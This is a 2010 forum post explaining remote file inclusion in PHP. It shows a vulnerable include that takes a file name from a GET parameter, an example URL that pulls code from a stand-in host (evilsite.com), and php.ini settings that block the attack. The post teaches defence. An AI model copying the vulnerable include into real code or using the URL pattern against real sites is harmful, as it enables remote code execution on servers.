Posted by:
stevenmartin99
(---.b-ras2.blp.dublin.eircom.net)
Not exactly ,
look at this code example
index.php
<?php
$filename = $_GET['file'];
include $filename.".php";
?>
Someone goes the site
http: //mysite.com?file=11 and is brought to page 11. GREAT!
Some goes to
http: //mysite.com?file=http://evilsite.com/evil_virus_code.txt? and now the virus code is included in your page.
To stop this happening- in the php.ini change the following
-------------------------------------------
allow_url_fopen = OFF
allow_url_include = OFF
register_globals = OFF
Steven Martin
stevenmartin99@gmail.comstevenmartin99@hotmail.comPampServer.com - [
pampserver.com]
Edited 3 time(s). Last edit at 09/07/2010 10:02AM by stevenmartin99.